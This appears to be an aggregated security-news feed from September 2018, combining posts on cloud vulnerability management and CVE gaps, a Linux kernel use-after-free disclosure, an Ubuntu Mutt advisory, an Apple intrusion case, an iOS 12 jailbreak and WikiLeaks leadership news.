Once the existence of the vulnerability is confirmed, enterprises must conduct risk management activities. Enterprises might first prioritize vulnerability remediation according to the criticality of the vulnerabilities. The Common Vulnerability Scoring System (CVSS) is one way on which the triaging of vulnerabilities is based. The system gives each vulnerability a score according to how critical it is, and from there enterprises can prioritize and remediate the more critical ones. Like other vulnerability information, CVSS scores are normally associated to CVE IDs.

Next, mitigating actions can be taken to remediate the vulnerabilities. This could refer to implementing patches, workarounds, or applying security controls. How the organization chooses to address the vulnerability is an exercise of risk management. They have to carefully balance their resources in relation to their risk appetite. But generally, organizations choose risk avoidance/rejection, risk acceptance, or risk mitigation.

Risk avoidance and rejection is fairly straightforward. Here, the organization doesn’t want to mitigate the vulnerability. At the same time, based on information available, the organization determines that the risk the vulnerability poses is above their risk threshold, and they stop using the vulnerable software.

Risk acceptance refers to when the organization, based on information available, determines that the risk posed is below their risk threshold and decides to accept the risk.

Lastly, in risk mitigation, the organization chooses to take mitigating actions and implement security controls that will reduce the risk. In traditional environments, such mitigating actions are possible because the organization generally owns and controls the infrastructure that provisions the IT service. For example, to mitigate a vulnerability, organizations are able to implement firewalls, intrusion detection systems, conduct system hardening activities, deactivate a service, change the configuration of a service, and many other options.

Thus, in traditional IT environments, organizations are able to take many mitigating actions because they own and control the stack. Furthermore, organizations have access to vulnerability information with which to make informed risk management decisions.

Cloud service customer challenges

Compared to traditional IT environments, the situation is markedly different for external cloud environments. The differences all stem from organizations not owning and controlling the infrastructure that provisions the cloud service, as well as not having access to vulnerability data of cloud native services.

Enterprise users don’t have ready access to cloud native vulnerabilities because there is no way to officially associate the data to cloud native vulnerabilities as CVE IDs are not generally assigned to them. Consequently, it’s difficult for enterprises to make an informed, risk-based decision regarding a vulnerable cloud service. For example, when should an enterprise customer reject the risk and stop using the service or accept the risk and continue using the service.

Furthermore, even if CVE IDs are assigned to cloud native vulnerabilities, the differences between traditional and cloud environments are so vast that vulnerability data which is normally associated to a CVE in a traditional environment is inadequate when dealing with cloud service vulnerabilities. For example, in a traditional IT environment, CVEs are linked to the version of a software. An enterprise customer can verify that a vulnerable version of a software is running by checking the software version. In cloud services, the versioning of the software (if there is one!) is usually only known to the cloud service provider and is not made public. Additionally, the enterprise user is unable to apply security controls or other mitigations to address the risk of a vulnerability.

This is not saying that CVEs and the associated vulnerability data are useless for cloud services. Instead, we should consider including vulnerability data that is useful in the context of a cloud service. In particular, cloud service vulnerability data should help enterprise cloud customers make the important risk-based decision of when to continue or stop using the service.

Thus, just as enterprise customers must trust cloud service providers with their sensitive data, they must also trust, blindly, that the cloud service providers are properly remediating the vulnerabilities in their environment in a timely manner.

The CVE gap

With the increasing global adoption and proliferation of cloud services, the exclusion of service vulnerabilities from the CVE system and the impacts of said exclusion have left a growing gap that the cloud services industry should address. This gap not only impacts enterprise vulnerability and risk management but also other key stakeholders in the cloud services industry.

In the next post, we’ll explore how other key stakeholders are affected by the shortcomings of cloud service vulnerability management.

Please let us know what you think about the INC3’s impacts on cloud service vulnerability and risk management in the comment section below, or you can also email us.

from Cloud Security Alliance Blog https://ift.tt/2R4xxJ3

Julian Assange will no longer be editor-in-chief of WikiLeaks

Julian Assange, the founder of popular whistleblower website WikiLeaks, is stepping down from the position of editor-in-chief of the organisation under "extraordinary circumstances."

Assange, the 47-year-old Australian hacker, founded WikiLeaks in 2006 and has since made many high-profile leaks, exposing 'dirty' secrets of several individuals, political parties as well as government organisations across the world.

Assange has been forced to live in the Ecuadorian Embassy in London since June 2012, after he was granted asylum by the Ecuador government when a British court ordered his extradition to Sweden to face questioning sexual assault and rape.

Ecuador has

cut Assange off the Internet

and any communication with the outside world except for his lawyers since late March this year, making it difficult for him to do his job of editor-in-chief to run WikiLeaks.

Wikileaks Appoints Its New Editor-in-Chief

According to a recent

from Wikileaks, those circumstances have forced the organisation to appoint its new editor-in-chief, though it says Assange will continue to be the publisher of WikiLeaks.

Assange will be replaced by former WikiLeaks spokesperson

Kristinn Hrafnsson

, who is an Icelandic investigative journalist and was selected for the 'Icelandic journalist of the year 2010' award for his work at WikiLeaks between 2009 and 2016.

"Due to extraordinary circumstances where Julian Assange, the founder of WikiLeaks has been held incommunicado (except visits by his lawyers) for six months while arbitrarily detained in the Ecuadorian embassy, Mr. Assange has appointed Kristinn Hrafnsson Editor in Chief of WikiLeaks. Mr. Assange will continue to be the publisher of WikiLeaks," the organisation said.

Hrafnsson

, 56, condemned the treatment of Assange in the Embassy, but he welcomed his new responsibility to "secure the continuation of the important work based on WikiLeaks ideals," WikiLeaks quoted Hrafnsson as saying.

This year has not been great for the WikiLeaks founder. Late in March, Internet access for Assange was removed after he breached an agreement set by the Ecuador government to refrain from interfering in other states' affairs that could affect their relationship with other countries.

In July, it was also reported that the newly-elected President of Ecuador visited London to finalize a deal with UK government to

withdraw the country's asylum

protection of Assange—eventually turning him over to the UK where he is facing an arrest warrant after skipping a bail payment.

from The Hacker News https://ift.tt/2R53bGt

Cisco Security prominent at NIAS, NATO’s largest cyber security conference

NATO’s mission is to protect the freedom of its members. NATO has innovated and adapted itself to ensure its policies, capabilities and structures meet current and future threats, including the collective defence of its members. In July 2016, Allies reaffirmed NATO’s defensive mandate and recognised cyberspace as a domain of operations in which NATO must defend itself as effectively as it does in the air, on land and at sea. Cyber security is also a critical component of its operations, enabling intelligence to be safeguarded and operational communications to be secure and confidential.

The NIAS is NATO’s largest cyber security conference and provides an opportunity for Alliance and government leaders, defence and cyber security specialists to discuss needs and priorities and suitable and effective cyber security solutions.

Cisco Security will again have a prominent presence as Gold sponsor at NIAS, NATO’s largest cyber conference that takes place October 16-18 in Mons, Belgium, for three days of engaging discussions on the critical role cyber security plays in securing the NATO Alliance.

Every day Talos, Cisco’s Security Research team analyses 1.5 million unique malware samples and blocks 20 billion threats using machine learning and cognitive analytics, backed by more than 250 threat intelligence researchers. By feeding intelligence on the latest threats into our security solutions in real time and using increased automation, we see a threat once and we stop it everywhere — enforcing intelligence across all of the network’s touch points and connections and reducing time to detection so that threats can be blocked before they cause damage.

Under the banner Security Above Everything, Cisco’s presence includes Anthony Grieco, Cisco’s Trust Strategy Officer, as the keynote speaker addressing how to manage cyber risk with a mobile workforce in a multi-cloud world and Martin Lee from Talos, Cisco Threat Intelligence as host of a technical workshop focused on securing the mobile workforce.

At the Cisco booth, delegates will be able to watch live demos and learn about our security products and solutions that enable private and public organisations to prevent, detect and respond to cyber attacks. Our customers and prospects are invited to book meetings with Cisco security experts through the event website. If you are attending the conference, please stop by and see us at Stand G2.

from Cisco Blog » Security https://ift.tt/2zCmFvo

Windows 10 security: Here's how we're hitting back at fileless malware, says Microsoft

Meet Torii, a new IoT botnet far more sophisticated than Mirai variants

Google Hacker Discloses New Linux Kernel Vulnerability and PoC Exploit

A cybersecurity researcher with Google Project Zero has released the details, and a proof-of-concept (PoC) exploit for a high severity vulnerability that exists in Linux kernel since kernel version 3.16 through 4.18.8.

Discovered by white hat hacker Jann Horn, the kernel vulnerability (CVE-2018-17182) is a cache invalidation bug in the Linux memory management subsystem that leads to use-after-free vulnerability, which if exploited, could allow an attacker to gain root privileges on the targeted system.

The use-after-free (UAF) vulnerabilities are a class of memory corruption bug that can be exploited by unprivileged users to corrupt or alter data in memory, enabling them to cause a denial of service (system crash) or escalate privileges to gain administrative access on a system.

Linux Kernel Exploit Takes an Hour to Gain Root Access

However, Horn says his

PoC Linux kernel exploit

made available to the public "takes about an hour to run before popping a root shell."

Horn responsibly reported the vulnerability to Linux kernel maintainers on September 12, and the Linux team fixed the issue in his upstream kernel tree within just two days, which Horn said was "exceptionally fast, compared to the fix times of other software vendors."

The Linux kernel vulnerability was disclosed on the oss-security mailing list on September 18 and was patched in the upstream-supported stable kernel versions 4.18.9, 4.14.71, 4.9.128, and 4.4.157 on the next day.

There's also a fix in release 3.16.58.

Debian and Ubuntu Linux Left its Users Vulnerable for Over a Week

"However, a fix being in the upstream kernel does not automatically mean that users' systems are actually patched," Horn noted.

The researcher was disappointed knowing that some major Linux distributions, including

Debian

and

Ubuntu

, left their users exposed to potential attacks by not releasing kernel updates more than a week after the vulnerability was made public.

As of Wednesday, both Debian stable and Ubuntu releases 16.04 and 18.04 had not patched the vulnerability.

However, the Fedora project already rolled out a

security patch

to its users on 22 September.

"Debian stable ships a kernel based on 4.9, but as of 2018-09-26, this kernel was last updated 2018-08-21. Similarly, Ubuntu 16.04 ships a kernel that was last updated 2018-08-27," Horn noted.

"Android only ships security updates once a month. Therefore, when a security-critical fix is available in an upstream stable kernel, it can still take weeks before the fix is actually available to users—especially if the security impact is not announced publicly."

In response to the Horn's

blog post

, the maintainers of Ubuntu says the company would possibly release the patches for the Linux kernel flaw around October 1, 2018.

Horn said that once the patch is deployed in the upstream kernel, the vulnerability and patch becomes public, which, in this case, could allow malicious actors to develop a Linux kernel exploit to target users.

from The Hacker News https://ift.tt/2R70X9C

Teenage Apple hacker avoids jail for 'hacky hack hack' attack

Thursday, September 27, 2018

USN-3719-3: Mutt vulnerabilities

mutt vulnerabilities

A security issue affects these releases of Ubuntu and its derivatives:

Ubuntu 16.04 LTS

Summary

Several security issues were fixed in Mutt.

Software Description

mutt - text-based mailreader supporting MIME, GPG, PGP and threading

Details

USN-3719-1 fixed vulnerabilities in Mutt. Unfortunately, the fixes were not correctly applied to the packaging for Mutt in Ubuntu 16.04 LTS. This update corrects the oversight.

We apologize for the inconvenience.

Original advisory details:

It was discovered that Mutt incorrectly handled certain requests. An attacker could possibly use this to execute arbitrary code. (CVE-2018-14350, CVE-2018-14352, CVE-2018-14354, CVE-2018-14359, CVE-2018-14358, CVE-2018-14353 ,CVE-2018-14357)

It was discovered that Mutt incorrectly handled certain inputs. An attacker could possibly use this to access or expose sensitive information. (CVE-2018-14355, CVE-2018-14356, CVE-2018-14351, CVE-2018-14362, CVE-2018-14349)

Update instructions

The problem can be corrected by updating your system to the following package versions:

Ubuntu 16.04 LTS: mutt - 1.5.24-1ubuntu0.2; mutt-patched - 1.5.24-1ubuntu0.2

To update your system, please follow these instructions: https://wiki.ubuntu.com/Security/Upgrades.

After a standard system update you need to restart mutt to make all the necessary changes.

References

from Ubuntu Security Notices https://ift.tt/2DzyMNK

Researchers label Australian data-sharing legislation a 'significant misalignment'

NSW focuses on risk in AU$20m cybersecurity strategy

US sentences to prison its first ATM jackpotter

DNSSEC Key Signing Key Rollover

FBI warns companies about hackers increasingly abusing RDP connections

16-Year-Old Boy Who Hacked Apple's Private Systems Gets No Jail Time

An Australian teenager who

pleaded guilty to break into Apple's private systems

multiple times over several months and download some 90GB of secure files has avoided conviction and will not serve time in prison.

An Australian Children's Court has given the now 19-year-old adult defendant, who was 16 at the time of committing the crime, a probation order of eight months, though the magistrate made him understand how serious his offense was.

The teen, whose cannot be named under a local law that protects the identity of juveniles, told the court that he hacked into Apple's systems because he was a huge fan of the company and "dreamed of" working for the technology giant.

The "Hacky Hack Hack" Folder

The teen hacked into Apple's servers not once, but numerous times over the course of more than a year—between June 2015 and November 2016, and in April 2017.

As soon as the tech giant detected his presence on their servers, it blocked him and contacted the Federal Bureau of Investigation (FBI), which took the help of the Australian Federal Police (AFP), who subsequently raided his home last year and arrested him.

The AFP also seized two Apple laptops, a mobile phone, and a hard drive that contained a folder named "Hacky Hack Hack Methods Exclude," including 12 files on methods to infiltrate and bypass Apple's security.

Australian investigators recovered 90GB of data "sensitive both from a privacy and commercial point of view," including extremely secure authorized keys used to grant login access to users, as well as access multiple user accounts, that he copied from Apple's systems.

Here's How The Boy Hacked Into Apple's Servers

According to the magistrate, the teenager exploited a virtual private network (VPN) to connect remotely to Apple's internal systems, according to

Bloomberg

With the help of his friend, the teenager then sent a malicious script to the system which created a secure shell tunnel that allowed him to access systems and bypass firewalls and eventually enabling them to download data.

Apple reportedly detected the intrusion and blocked his access in November 2016, but the teenager regained access last year in April.

The teen was pleaded guilty to two charges in August this year, but no conviction was recorded against him since the magistrate told the court that he had shown remorse and had cooperated with law enforcement.

Instead of jail time, the defendant would only be given eight-month probation.

"Your offending is serious," the magistrate told the teenager. "It was sustained, sophisticated, and a successful attack on the security of a major multinational corporation."

Apple assured its customers that no personal data was compromised in the hack.

The young hacker has since been accepted into university to study criminology and cyber safety.

Prosecutor says the investigation into the case is still ongoing and could result in other people being charged, including a second teenager who helped him in committing the crime.

from The Hacker News https://ift.tt/2IoIkdq

Port of San Diego suffers cyber-attack, second port in a week after Barcelona

Google launches VirusTotal Enterprise

Pangu Hackers have Jailbroken iOS 12 on Apple's New iPhone XS

Bad news for Apple.

The Chinese hacking team Pangu is back and has once again surprised everyone with a jailbreak for iOS 12 running on the brand-new iPhone XS.

Well, that was really fast.

Pangu jailbreak team has been quiet for a while, since it last released the untethered

jailbreak tool for iOS 9

back in October 2015.

Jailbreaking is a process of removing limitations on Apple's iOS devices so users can install third-party software not certified by Apple.

Today, Android and iOS security researcher Min(Spark) Zheng

shared

a Tweet with two screenshots showing a working jailbreak on Apple's newly released iPhone XS with A12 Bionic chip achieved by one of the Pangu researchers.

The Tweet also revealed that the iOS 12 jailbreak works by bypassing a functional PAC (Pointer authentication codes) mitigation implemented in the new Apple's A12 Bionic chip.

Moreover, since the hardware of iPhone XS is very much identical to iPhone XS Max, the new iOS 12 jailbreak exploit should also work on both Apple's latest flagship iPhones.

Since the Pangu jailbreak team has not made any official announcement regarding the new jailbreak, it is not clear whether or not the team will release the iOS 12 jailbreak to the public.

Also, before jailbreaking your Apple devices, just keep in mind that this will violate your End User License Agreement with Apple and also exposes your iOS device to security bugs, putting your personal data at risk, for which you won't be getting Apple's help if anything goes wrong.

Jailbreaking your iPhones also opens up your device to iOS malware such as

KeyRaider

and

YiSpector

that specifically targeted iOS users with jailbroken devices.

So, how are you feeling right now about the new jailbreaking? Let us know in the comments below.

from The Hacker News https://ift.tt/2R4qC2r

Sunday, September 30, 2018

Saturday, September 29, 2018

Sep 26, 2018 9:00 am EDT | Low Severity

Facebook Hack: 10 Important Updates You Need To Know About

Friday, September 28, 2018

What is malicious code?

How can you protect yourself against malicious code?

What do you need to know about antivirus software?

How do you recover if you become a victim of malicious code?

Threat Roundup Sept 21 – 28

Traditional vulnerability and risk management

Cloud service customer challenges

The CVE gap

Wikileaks Appoints Its New Editor-in-Chief

Linux Kernel Exploit Takes an Hour to Gain Root Access

Debian and Ubuntu Linux Left its Users Vulnerable for Over a Week

Thursday, September 27, 2018

mutt vulnerabilities

Summary

Software Description

Details

Update instructions

References

The "Hacky Hack Hack" Folder

Here's How The Boy Hacked Into Apple's Servers